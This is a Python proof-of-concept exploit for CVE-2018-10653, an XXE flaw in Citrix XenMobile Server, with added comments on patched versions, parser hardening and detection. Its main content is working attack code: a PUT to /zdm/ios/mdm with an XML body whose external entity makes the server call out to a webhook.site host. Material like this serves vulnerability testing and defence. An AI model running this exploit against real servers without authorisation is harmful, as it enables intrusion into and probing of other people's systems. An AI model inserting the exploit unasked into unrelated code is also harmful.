Citrix XenMobile XXE Exploit
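#!/usr/bin/python3
##
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
## How the check works:
##   The request body is an XML document whose DOCTYPE declares an external
##   parameter entity pointing at WEBHOOK + <run id> + "/test.dtd". If the
##   server's XML parser resolves external entities, it fetches that URL, and
##   the hit shows up in the webhook's request log under the printed run id.
##   The callback, not the HTTP response printed at the end, is the signal this
##   script is set up to observe.
##
## Notes for defenders:
##   * Fix: the header above lists 10.8 RP2 and 10.7 RP3 as the first patched
##     rolling patches; anything older on those branches should be upgraded.
##   * The underlying weakness is an XML parser that processes DTDs and external
##     entities on request bodies; hardening means disabling both in the parser.
##   * Detection ideas (verify against your own logging): PUT requests to
##     /zdm/ios/mdm whose body contains a DOCTYPE declaration, and outbound
##     HTTP(S) from the server to hosts it does not normally contact.
##   * WEBHOOK is a third-party service, so the callback (including the server's
##     egress address) is visible to that service.
##
import sys
import uuid
from pprint import pprint

import requests

# Surf to https://webhook.site and copy/paste the URL below. Used for XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

# Upper bound, in seconds, on connecting and on waiting for data, so a
# filtered or unresponsive host cannot hang the script indefinitely.
TIMEOUT_SECONDS = 30

# The original indexed sys.argv[1] directly and died with an IndexError
# traceback when no target was given; fail with a usage line instead.
if len(sys.argv) < 2:
    sys.exit("Usage: " + sys.argv[0] + " <base URL of the XenMobile server>")
target = sys.argv[1]

# Per-run token embedded in the callback path so that a hit in the webhook log
# can be matched to this run. Named run_id rather than `id` so the builtin
# id() is not shadowed.
run_id = str(uuid.uuid1())

# XML body: a DOCTYPE with one external parameter entity that references the
# callback URL and is then expanded inside the internal subset.
xml = '''<?xml version="1.0" encoding="UTF-8" standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' + WEBHOOK + run_id + '''/test.dtd">%j00t9; ]>'''

print(run_id)

try:
    response = requests.put(
        target + '/zdm/ios/mdm',
        # NOTE: verify=False turns off TLS certificate validation, so the peer
        # is not authenticated and the printed response could come from any
        # host on the path. Kept from the original; do not reuse this setting
        # in production code.
        verify=False,
        headers={
            'User-Agent': 'MDM/1.0',
            'Connection': 'close',
            'Content-Type': 'application/x-apple-aspen-mdm',
        },
        data=xml,
        stream=True,
        timeout=TIMEOUT_SECONDS,
    )
except requests.exceptions.RequestException as exc:
    # Connection, TLS and timeout failures end the run with a short message
    # and a non-zero exit status instead of a traceback.
    sys.exit("Request failed: " + str(exc))

# Same output as the original: raw body bytes, decoded body, then the
# Response object's repr (which shows the status code).
print(response.content)
print(response.text)
pprint(response)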